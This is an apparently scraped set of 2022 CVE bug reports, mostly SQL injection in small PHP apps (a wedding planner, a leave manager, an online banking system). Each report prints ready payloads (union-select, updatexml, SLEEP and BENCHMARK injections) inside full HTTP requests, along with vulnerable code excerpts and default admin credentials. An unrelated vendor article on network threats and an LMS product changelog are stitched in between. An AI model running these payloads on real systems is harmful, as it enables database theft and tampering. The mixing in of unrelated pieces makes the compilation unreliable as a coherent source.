Wedding Planner v1.0 was discovered to contain a SQL injection vulnerability via the booking parameter at /admin/client_assign.php.

Permalink

**Wedding Planner v1.0 by pushpam02 has SQL injection**

BUG\_Author: shark007

vendors: https://www.sourcecodester.com/php/15375/wedding-planner-project-php-free-download.html

Vulnerability File: /Wedding-Management-PHP/admin/client\_assign.php?booking=

Vulnerability location: /Wedding-Management-PHP/admin/client\_assign.php?booking=, booking

\[+\] Payload: /Wedding-Management-PHP/admin/client\_assign.php?booking=-33%20union%20select%201,2,3,4,5,database(),7,8--+&user\_id=33

dbname = dbwedding

GET /Wedding\-Management\-PHP/admin/client\_assign.php?booking\=\-33%20union%20select%201,2,3,4,5,database(),7,8\--+&user\_id=33 HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=ncd6h7doujvbbft46r0m7mbr6s
Connection: close

CVE-2022-40402: Bug_report/SQLi-1.md at main · wshark00/Bug_report

Wedding Planner v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/feature_edit.php.

Permalink

**Wedding Planner v1.0 by pushpam02 has SQL injection**

BUG\_Author: shark007

vendors: https://www.sourcecodester.com/php/15375/wedding-planner-project-php-free-download.html

Vulnerability File: /Wedding-Management-PHP/admin/feature\_edit.php?id=

Vulnerability location: /Wedding-Management-PHP/admin/feature\_edit.php?id=

\[+\] Payload: /Wedding-Management-PHP/admin/feature\_edit.php?id=-8%20union%20select%201,2,database(),4--+

dbname = dbwedding

GET /Wedding\-Management\-PHP/admin/feature\_edit.php?id\=\-8%20union%20select%201,2,database(),4\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=ncd6h7doujvbbft46r0m7mbr6s
Connection: close

CVE-2022-40403: Bug_report/SQLi-3.md at main · wshark00/Bug_report

Online Leave Management System v1.0 is vulnerable to SQL Injection via /leave_system/classes/Master.php?f=delete_leave_type.

Permalink

**Online Leave Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: Tmoont

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/14910/online-leave-management-system-php-free-source-code.html

Vulnerability File: /leave\_system/classes/Master.php?f=delete\_leave\_type

Vulnerability location: /leave\_system/classes/Master.php?f=delete\_leave\_type,id

dbname=leave\_db,length=8

\[+\] Payload: id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /leave\_system/classes/Master.php?f\=delete\_leave\_type HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.19/leave\_system/admin/?page=maintenance/department
Content-Length: 65
Cookie: PHPSESSID=a58hbbkeelngug4ek0dssb0rb5
Connection: close
id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-40926: Bug_report/SQLi-2.md at main · admin77888/Bug_report

Online Leave Management System v1.0 is vulnerable to SQL Injection via /leave_system/classes/Master.php?f=delete_designation.

**Online Leave Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: Tmoont

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/14910/online-leave-management-system-php-free-source-code.html

The program is built using the xmapp-php8.1 version

First create a table in the database

CREATE TABLE \`designation\_ist\` (
  \`id\` int(11) NOT NULL
) ENGINE\=InnoDB DEFAULT CHARSET\=utf8mb4;
COMMIT;

Vulnerability File: /leave\_system/classes/Master.php?f=delete\_designation

Vulnerability location: /leave\_system/classes/Master.php?f=delete\_designation,id

dbname=leave\_db,length=8

\[+\] Payload: id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /leave\_system/classes/Master.php?f\=delete\_designation HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.19/leave\_system/admin/?page=maintenance/department
Content-Length: 65
Cookie: PHPSESSID=a58hbbkeelngug4ek0dssb0rb5
Connection: close
id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-40927: Bug_report/SQLi-1.md at main · admin77888/Bug_report

Online Leave Management System v1.0 is vulnerable to SQL Injection via /leave_system/classes/Master.php?f=delete_application.

Permalink

Cannot retrieve contributors at this time

**Online Leave Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: Tmoont

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/14910/online-leave-management-system-php-free-source-code.html

Vulnerability File: /leave\_system/classes/Master.php?f=delete\_application

Vulnerability location: /leave\_system/classes/Master.php?f=delete\_application,id

dbname=leave\_db,length=8

\[+\] Payload: id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /leave\_system/classes/Master.php?f\=delete\_application HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.19/leave\_system/admin/?page=maintenance/department
Content-Length: 65
Cookie: PHPSESSID=a58hbbkeelngug4ek0dssb0rb5
Connection: close
id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-40928: Bug_report/SQLi-3.md at main · admin77888/Bug_report

Cybersecurity today matters so much because of everyone's dependence on technology, from collaboration, communication and collecting data to e-commerce and entertainment. Every organisation that needs to deliver services to their customers and employees must protect their IT 'network' - all the apps and connected devices from laptops and desktops to servers and smartphones.
While traditionally,

Cybersecurity today matters so much because of everyone's dependence on technology, from collaboration, communication and collecting data to e-commerce and entertainment. Every organisation that needs to deliver services to their customers and employees must protect their IT 'network' - all the apps and connected devices from laptops and desktops to servers and smartphones.

While traditionally, these would all live on one "corporate network," - networks today are often just made up of the devices themselves, and how they're connected: across the internet, sometimes via VPNs, to the homes and cafes people work from, to the cloud and data centres where services live. So what threats does this modern network face?

Let's look at them in more detail.

****#1 Misconfiguration****

According to recent research by Verizon, misconfiguration errors and misuse now make up 14% of breaches. Misconfiguration errors occur when configuring a system or application so that it's less secure. This can happen when you change a setting without fully understanding the consequences, or when an incorrect value is entered. Either can create a serious vulnerability - for example, a misconfigured firewall can allow unauthorized access to an internal network, or a wrongly configured web server could leak sensitive information.

****#2 Outdated software****

Software and app developers constantly release updates with patches to cover vulnerabilities that have been discovered in their code. Applying patches to fix these vulnerabilities across an organisation's entire network of devices can be time-consuming and complex to implement - but it is essential. If you don't update your software, firmware and operating systems to the latest versions as they're released, you're leaving your network exposed. A vulnerability scanner will give you a real-time inventory of all the software which needs updating, as well as detect misconfigurations that reduce your security, so you can stay as secure as possible.

****#3 DoS attack****

The previous two threats are usually exploited to breach networks and steal information, but a Denial-of-Service (DoS) attack is meant to shut down your network and make it inaccessible.

This can be done by many means, either with malware, or by flooding the target network with traffic, or sending information that triggers a crash such as requesting overly complex queries that lock up a database. In each case, the DoS attack prevents customers or employees from using the service or resources they expect.

DoS attacks often target websites of high-profile organisations such as banks, media companies and governments. Though DoS attacks don't usually result in the theft or loss of data, they can cost you a great deal of time and money to handle. A properly configured content delivery network (CDN) can help protect websites against DoS attacks and other common malicious attacks.

****#4 Application bugs****

A software bug is an error, flaw or fault in an application or system that causes it to produce an incorrect or unexpected result. Bugs exist in every piece of code for all sorts of reasons, from improper testing or messy code to a lack of communication or inadequate specifications documents.

Not all bugs are cyber security issues or vulnerable to exploitation where an attacker can use the fault to access the network and run code remotely. However, some bugs like SQL injection can be very serious, and allow the attackers to compromise your site or steal data. Not only do SQL injections leave sensitive data exposed, but they can also enable remote access and control of affected systems. This is just one example of a type of application bug, but there are many others.

Injections are common if developers haven't had sufficient security training, or where mistakes are made and not code reviewed – or when combined with inadequate continuous security testing. However, even when all these things are done - mistakes can still happen, which is why it's still ranked as the #1 threat in the OWASP Top Ten Web Application Security Risks. Fortunately, many types of injection vulnerabilities (and other application level security bugs) can be detected with an authenticated web vulnerability scanner, and penetration testing for more sensitive applications.

****#5 Attack surface management****

Can you secure your business if you don't know what internet-facing assets you own? Not effectively. Without a complete and updated inventory of internet-facing assets, you don't know what services are available and how attackers can attempt to get in. But keeping on top of them and ensuring that they're being monitored for weaknesses isn't exactly a walk in the park as IT estates grow and evolve almost daily.

When companies try to document their systems, they often rely on manually updating a simple spreadsheet, but between configuration changes, new technologies, and shadow IT, they rarely know exactly what assets they own or where. But discovering, tracking, and protecting all these assets is a critical component of strong security for every business.

A vulnerability scanner is a dynamic, automated tool that can keep track of what's exposed to the internet, and restrict anything that doesn't need to be there - like that old Windows 2003 box everyone's forgotten about, or a web server that a developer spun up for a quick test before leaving the business…

It can also keep a constant watch over your cloud accounts and automatically add any new external IP addresses or hostnames as targets. And it can help with 'asset discovery' when companies need help finding their IP addresses and domains that they don't even know about.

****What does this mean for you?****

Attackers use automated tools to identify and exploit vulnerabilities and access unsecured systems, networks or data - however big or small your organisation. Finding and exploiting vulnerabilities with automated tools is simple: the attacks listed above are cheap, easy to perform and often indiscriminate, so every organisation is at risk. All it takes is one vulnerability for an attacker to access your network.

Knowing where your vulnerabilities and weak points are is the first and most important step. If you spot your vulnerabilities early, you can address them before an attacker can exploit them. A vulnerability scanner is a cloud-based service that identifies security vulnerabilities in computer systems, networks and software. Vulnerability scanners provide a continuous service that searches for network threats and vulnerabilities - everything from weak passwords to configuration mistakes or unpatched software - so you can address them before attackers exploit them.

****Vulnerability management made easy****

Intruder's network vulnerability scanner is powered by industry-leading scanning engines used by banks and governments across the world. It's capable of finding over 11,000+ vulnerabilities and focuses on what matters, saving time with contextually-prioritised results. Using noise reduction, it only reports actionable issues that have a genuine impact on your security.

Intruder offers a 30-day free trial of their vulnerability scanner

By scanning both your internal and external attack surface, Intruder monitors your publicly and privately accessible servers, cloud systems, websites and endpoint devices. Fewer targets for hackers mean fewer vulnerabilities for you to worry about.

Organisations around the world trust Intruder's vulnerability scanner to protect their networks with continuous security monitoring and comprehensive scanning.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

5 Network Security Threats And How To Protect Yourself

Academy Learning Management System before v5.9.1 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the Search parameter.

Academy Lms is a marketplace script for online learning. Here students and teachers are combined together for sharing knowledge through a structured course-based system. Teachers or instructors can create an unlimited number of courses, video lessons and documents according to their expertise and students can enroll in these courses and make themselves skilled anytime and from anywhere.  
So start selling your courses by installing ACADEMY and make your online business today.  

**Quick start guide for course instructor/admin**

*   Read all our provided documentation carefully before using the software
*   Install the application following “Installation and Update” guide carefully
*   Login as site administrator to organize your system
*   At first update your System Settings and Payment Settings from Settings option of the left sidebar menu. Also, make sure to provide a valid YouTube API key and a valid Vimeo API key on System Settings.
*   If you have updated the Settings successfully, you can go to Categories option from the same left sidebar menu and create Categories.
*   After creating Category, you can create Sub-categories under a specific Category. For creating Sub-categories you can go to the Categories page, select a specific category, click on the Action dropdown menu and select Manage Sub-categories. It will take you to the Sub-categories page. Now you can simply click on “+Add Sub Category” button and fill all the required fields to create a Sub-category.
*   Now its time to create some Courses. Since a course will contain all the video lessons you have to create it carefully. Move to Courses option from the left menu, You will get a “ Add Course Form” after clicking on “+Add Course” button. Fill all the fields carefully
*   Every Course should have at least one Section. Because at the end you will have to add a lesson under a specific section of a specific course. So, now you will have to create at least one section. Move to the Courses page, select a specific course, click on the action dropdown menu and select Manage Section. After clicking on Manage Section you will get the list of Section which is empty now. You have to create one by clicking the “+Add Section” button
*   As you have created a Course and a section or multiple sections, now you will be able to create a lesson. Now, let’s move to the Course page again, select a specific course, click on the Action dropdown button, select Manage Lesson. It will also show the list of lessons that you’ve created. To add new you can just click on “+Add Lesson” button

**Quick start guide for course students**

*   Since the application has been already installed. Student can access the website by simply hitting the application URL
*   Home page will appear every time a student hits the URL. From the home page, a student can search for a specific course, get all the top courses, top ten latest courses, get category based courses. A student can sign up if he/she is not registered yet. If a student is already registered he/she can log in. Student can add courses on their Shopping Carts or add them on their Wishlists
*   Students can see the course details by simply clicking on a course thumbnail. The course details page contains all the essentials information about a course like, Title, Description, Outcomes, The prerequisites of the course, Lesson list Instructor details, and the rating and reviews. User can see a course overview here
*   If Student want to buy the course they must add those courses on their cart
*   After adding a course on Shopping cart if a student wants to see their cart items, they can to go to the Shopping Cart page by clicking on Go To Cart button, which appears on hovering over the cart icon of the header
*   Student can remove courses if they want from the shopping cart page
*   On the right side of the shopping cart page is the total price of the cart items. Under that is the Checkout button. If student want to check out they can simply click on the Checkout button and pay for those courses
*   After a successful checking out student can see their courses on the My Courses menu. The student will get the My Courses button by hovering over their profile image from the header
*   My Courses page will show all the courses which are purchased by that student. Student can play the lessons by clicking on the thumbnail from the My Courses page

**Update Log**

**Version 5.9.1 – 16 August, 2022**

\- Home page newly designed
- Footer newly designed
- Sign up URL enhanced to improve SEO
- The uploaded images are optimized automatically
- Footer link issue fix
- Auto logout issue fix

**Version 5.9 – 3 July, 2022**

\- Pagination added to the search result page
- Pagination added to the course filter page
- Search result optimised from in dept course data
- Quiz result issue fixed and experience improved

**Version 5.8 – 26 May, 2022**

\- New! limitation on account access from multiple devices
- Admin can set how many account can be accessed by a single student account
- Create any number of new pages for your course website
- Video uploading progress bar shown during lesson creation
- Quiz question type added: true-false, fill in the blanks, multiple choice, single choice
- Instructor now can view student's quiz results
- Quizzes now have timer to complete within a certain time period
- Login session time period extended
- Issue fix for blog category link access
- Smtp crypto settings now added

**Version 5.7 – 18 April, 2022**

\- Drip content feature introduced
- Student has to complete previous lesson to access the next one
- Showing learning progress in course playing page
- Publicly course access permission settings (allow/deny) from admin panel
- Message read and unread status showed in messaging page between student and instructor
- Certificate addon update: drag & drop builder
- Certificate addon update: background image changing capability
- Certificate addon update: QR code shown for certificate validation

**Version 5.6 – 17 February, 2022**

\- Api updated for student and instructor mobile app
- Show email with name when admin enroll a student
- Delete enrolment history when a course is deleted
- Blog keywords for course website SEO performance enhance
- Minor bug fixed

**Version 5.5 – 19 January, 2022**

\- Blog module introduced
- Admin & instructor can write blog posts
- 'Buy' button added in course page
- Instructor skills added
- New page for forget password
- Newly designed user interface for student account panel
- Document type lessons now have preview option
- Coupon code discount feature enhanced
- Razorpay payment gateway option for instructor payout
- Store quiz result of students
- Api updated for mobile apps
- Source code optimised and performance upgraded

**Version 5.4 – 2 November, 2021**

\- Updated with bootstrap 5
- Completely newly designed frontend website layout

**Version 5.3 – 16 September, 2021**

\- Student can continue learning from last time viewed lesson (watch history preserved)
- When purchasing a course without login, redirected to that course after login.
- The video source URL has been hidden for HTML5 video URL and Video file.
- Added language select option to instructor panel.

**Version 5.2 – 30 August, 2021**

\- New lesson type: text format
- Facebook login for students added
- Admin permission for quick action menu fixed
- Refund policy option settings added

**Version 5.1 – 4 August, 2021**

\- New lesson type: google drive
- Razorpay payment gateway comes as standard
- Free lesson preview

**Version 5.0 – 1 June, 2021**

\- Adding new admins
- Admin role permission setting
- Multi instructor in single course
- Coupon code
- Course compare feature
- Application performance improvement
- Organised Admin navigation menu
- Organised applications assets
- Documentation updated

**Version 4.7 – 8 May, 2021**

\- Responsive issue solved on the course playing page.
- Bug fixed on social sharing content.
- A new API has been added for the Instructor mobile app.

**Version 4.6 – 23 March, 2021**

\- Sub category selection fixed for mobile device screens.
- Minor bug fixes
- Performance improvement

**Version 4.5 – 9 February, 2021**

\- Ability to filter courses according to parent categories.
- Security check on installing addons.
- Course preloaded on homepage. 
- Fixed a minor bug on course completion.

**Version 4.4 – 22 December, 2020**

\- Google recaptcha introduced for enhanced account security
- Dashboard shortcut for : Add student, Enrol student, Add course, Add lesson
- Mobile API updated
- Layout updated in course detail page for mobile device responsiveness.

**Version 4.3 – 20 October, 2020**

\- Browser cache issue on image uploading has been solved.
- Ratings and reviews are now showing perfectly on mobile device.
- Server storage has been optimised by removing the previous video file while updating video type lessons.
- Stripe payment API is working fine in Academy mobile app.
- Top courses are now accessible from mobile devices.
- Latest courses are now accessible from mobile device.
- Info banner is now aligned perfectly in mobile device.

**Version 4.2 – 15 September, 2020**

\- Sending verification code instead of link on user verification email. Since sometimes mail with a link considered as suspicious.
- Keeping stripe session id and transaction id on stripe payment.        
- Enhanced the security of stripe payment.
- Total lesson count is now working fine in all dashboard.   
- Minor bug fixes and performance improvement.

**Version 4.1 – 19 August, 2020**

\- All payment gateways are included in mobile app.
- Students can purchase course inside mobile app using all available payment gateways and addons.
- Rating review posting by student random issue fix
- Version update procedure updated

**Version 4.0.1 – 6 July, 2020**

\- Stripe payment gateway updated for course purchase
- Api updated for mobile application
- Minor bug fixes

**Version 4.0 – 17 June, 2020**

\- New instructor workflow introduced
- Admin can add new instructor from admin panel
- User needs to apply to be an instructor if the admin keeps it enabled
- New dashboard and menu for instructor panel
- New sales report page for instructor
- New payout report page for instructor
- New instructor payout processing system
- The instructor now have the opportunity to request a withdrawal request
- Language switcher from frontend website
- New lesson creation layout and very user-friendly workflow
- A separate form for each type of lessons and it can be switched instantly
- Video upload option in lesson creation form with possible upload size info
- Toaster notification translation issue fixed
- Student page title issue fixed
- Lesson deletion issue while course deletion is fixed
- Multi-language helper updated
- Courses can be added to wishlist from course detail page
- User is shown an alert before removing a course from wishlist
- Outgoing email text enhanced for being marked as spam by Gmail

**Version 3.6 – 23 April, 2020**

\- Iframe embed code feature added.
- Now you can add google slide, slideshare slides and any embeddable external content.

**Version 3.5 – 8 April, 2020**

\- Minor bug fixes.

**Version 3.4 – 20 March, 2020**

\- Android API added to purchase a course from inside the student's mobile app.

**Version 3.3 – 10 March, 2020**

\- Checkout page updated

**Version 3.2.1 – 1 March, 2020**

\- Academy lms site slow speed performance fixed

**Version 3.2 – 19 February, 2020**

\- Payment system upgraded and designed from scratch
- Disabled payment gateways are now hidden from student course purchase page
- Some minor bug fixes in course, lesson management in the admin panel

**Version 3.1 – 15 January, 2020**

\- EU cookie note added with cookie policy acceptance
- Course purchase notification to instructor, admin, student
- Disabled payment method is now inactive in course purchasing cart
- Instructor list is shown in the admin panel
- API updated for mobile app course purchasing
- Enroll history report updated to current month by default
- Addon system introduced
- New addon manager for addon installation, activation or deactivation
- Certificate addon released. Buy here: https://codecanyon.net/item/x/25515213
- Documentation updated

**Version 3.0 – 12 October, 2019**

\- Android app API published
- Separate video lesson configuration for mobile app added
- Lesson player CSS fixed
- Footer text made dynamic from admin panel
- Course curriculum layout issue fixed
- Course duration value fixed
- Course title short layout enhanced

**Version 2.4 – 17 September, 2019**

\- User interface updated

**version 2.3 – 12 August, 2019**

\- Course progress feature added for students
- Students can mark / unmark a lesson as complete
- My course page shows completion percentage of every purchased course
- Video lessons can be resumed from last time watched ( applicable for .mp4 videos )

**version 2.2 – 10 July, 2019**

\- Course playing page new layout introduced. Designed and coded from scratch.
- Theme installation option added.
- Theme chooser, activation and deactivation option added.

**version 2.1 – 16 June, 2019**

\- stripe payment gateway api updated
- admin now have option to enable or disable email verification
- course purchasing cart page crash issue fixed

**version 2.0 – 10 June, 2019**

\- quiz module introduced
- MCQ question manager for course quiz
- quiz sorting option added
- new course manager layout
- course filter for admin to sort out easily
- courses and section now grouped in a single page
- brand new admin panel layout
- admin now have monthly income graph chart
- new instructor dedicated panel introduced
- category manager updated
- new course filter page added in frontend website
- courses can be filtered by category, price, level, language, rating
- filter course with list view and grid view
- all user login page unified in a single form
- new website launched for academy : http://www.academy-lms.com

**version 1.3 – March, 2019**

\* Free course enrolment opportunity
\* Confirmation email on student account register
\* Custom smtp settings for site admin
\* Stopped playing course preview on background
\* Shopping cart view updated
\* Minor bugs fixes

**version 1.2 – January, 2019**

\* Lesson file type added : text, pdf, doc, own server video
\* Description field for all course lessons
\* Video player updated and enhanced 
\* Added course title/summary to course playing page
\* Course activation notification updated.
\* Site title issue fixed
\* Seo settings for course pages
\* Added currency settings

**version 1.1 – November, 2018**  
\[ backend \]

\* Status Wise course creating.
\* Show number of courses by status on Dashboard as well as on Admin navigation menu.
\* Made managing sub-category more comprehensive on the category page.
\* Added icon picker on Category and subcategory add and edit form
\* Added an instructor filter on course table.
\* Separated Active and Pending courses status wise inside the course page.
\* Admin now has an option of “View Course on Frontend” inside course page.
\* Admin now can make a course Active as well as Pending.
\* Made Course overview URL optional while creating a course.
\* Made Course thumbnail optional while creating a course.
\* Made generating Lesson’s video duration more understandable. 
\* Added an optional Payment information field for Student. While creating and editing student. It is required for Instructors only.
\* Added Enrol a Student option. Now admin can enrol a student manually from the backend.
\* A new navigation menu “Report" has been added. 
\* Admin now can see all the revenue he got after a successful course purchasing.
\* Admin now can see all the revenue an Instructor got after a successful course purchasing.
\* Admin now can pay instructors.
\* Made Updater module functional for future updates.
\* Added two different Logo Uploader. One for backend another for Frontend.
\* Added Favicon uploader.
\* Added Instructor settings inside Settings option.
\* Fixed the “Action” Button breaking on small devices.
\* Dynamic footer text.

\[ frontend \]

\* Showing all the courses by course status. That means only Active courses are now being shown.
\* Fixed the login modal’s title.
\* Wish listed courses are now can be removed from the wish list page.
\* Already Purchased Button now redirects to My Courses page.
\* Fixed the issue of courses with no course overview URL or course thumbnail.
\* Instructor can see his course’s curriculums from the Course details page.
\* Respective instructor details of every course is showing on course details page.
\* Fixed the escape HTML tags issue on instructor Biography.
\* Added Instructor menu on the frontend navigation.
\* Creating course from the frontend.
\* Separated Active, Pending and Drafted course on instructor dashboard.
\* Instructor can see his created course details and respected course’s lessons from the frontend.
\* Instructor can make a published course to Draft course.
\* Instructor can create, update and delete sections from the frontend.
\* Serialize sections from the frontend.
\* Can Add, Update or Delete lessons from the frontend.
\* Instructor’s Payment report on the frontend.
\* Payment settings. Which is mandatory for being an Instructor.

**version 1.0 – October, 2018**

\- first version released

**Requirements**

*   Apache web server for running php
*   PHP version 7
*   Mysql database access, purchase code during installation
*   Php curl should be enabled
*   One purchase code is legal for using one domain only

**Contact support**

Send us a ticket for presale questions and getting after sales developer support via zendesk.  
http://support.creativeitem.com

CVE-2022-38553: Academy Learning Management System

Online Banking System v1.0 was discovered to contain a SQL injection vulnerability via the cust_id parameter at /net-banking/send_funds.php.

Permalink

**Vulnerability file address**

net-banking/send_funds.php from line 9,The $_GET['cust_id'] parameter is controllable, the parameter cust\_id can be passed through get, and the $id is not protected from sql injection, line 13 $result0 = $conn->query($sql0); made a sql query,resulting in sql injection

......
......
......
    if (isset($\_GET\['cust\_id'\])) {
        $id = $\_GET\['cust\_id'\];
    }

    $sql0 = "SELECT \* FROM customer WHERE cust\_id=".$id;
    $result0 = $conn\->query($sql0);
    $row0 = $result0\->fetch\_assoc();
......
......
......

**POC**

GET /net-banking/send\_funds.php?cust\_id=666 AND (SELECT 1043 FROM (SELECT(SLEEP(5)))rbwc) HTTP/1.1
Host: www.bank.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

**Attack results pictures**

CVE-2022-40113: BugReport/sql_injection3.md at main · 0clickjacking0/BugReport

Online Banking System v1.0 was discovered to contain a SQL injection vulnerability via the cust_id parameter at /net-banking/edit_customer.php.

**Vulnerability file address**

net-banking/edit_customer.php from line 16,The $_GET['cust_id'] parameter is controllable, the parameter cust\_id can be passed through get, and the $_GET['cust_id'] is not protected from sql injection, line 23 $result0 = $conn->query($sql0); made a sql query,resulting in sql injection

......
......
......
    if (isset($\_GET\['cust\_id'\])) {
        $\_SESSION\['cust\_id'\] = $\_GET\['cust\_id'\];
    }

    $sql0 = "SELECT \* FROM customer WHERE cust\_id=".$\_SESSION\['cust\_id'\];
    $sql1 = "SELECT \* FROM passbook".$\_SESSION\['cust\_id'\]." WHERE trans\_id=(
                    SELECT MAX(trans\_id) FROM passbook".$\_SESSION\['cust\_id'\].")";

    $result0 = $conn\->query($sql0);
......
......
......

**POC**

GET /net-banking/edit\_customer.php?cust\_id=666 AND (SELECT 5721 FROM (SELECT(SLEEP(5)))pcwq) HTTP/1.1
Host: www.bank.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

**Attack results pictures**

CVE-2022-40114: Found a vulnerability · Issue #16 · zakee94/online-banking-system

Online Banking System v1.0 was discovered to contain a SQL injection vulnerability via the cust_id parameter at /net-banking/delete_beneficiary.php.

Permalink

**Vulnerability file address**

net-banking/delete_beneficiary.php from line 17,The $_GET['cust_id'] parameter is controllable, the parameter cust\_id can be passed through get, and the $_GET['cust_id'] is not protected from sql injection, line 21 if (($conn->query($sql0) === TRUE)) made a sql query,resulting in sql injection

......
......
......
if (isset($\_GET\['cust\_id'\])) {
        $sql0 = "DELETE FROM beneficiary".$\_SESSION\['loggedIn\_cust\_id'\].
                " WHERE benef\_cust\_id=".$\_GET\['cust\_id'\];
    }

    $success = 0;
    if (($conn\->query($sql0) === TRUE)) {
        $sql0 = "SELECT MAX(benef\_id) FROM beneficiary".$\_SESSION\['loggedIn\_cust\_id'\];
        $result = $conn\->query($sql0);
        $row = $result\->fetch\_assoc();
......
......
......

**POC**

GET /net-banking/delete\_beneficiary.php?cust\_id=666 AND 3629=BENCHMARK(5000000,MD5(0x7a6f6b4e)) HTTP/1.1
Host: www.bank.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=m5fjmb3r9rvk4i56cqc22ht3c3
Upgrade-Insecure-Requests: 1

**Attack results pictures**

Tag

#sql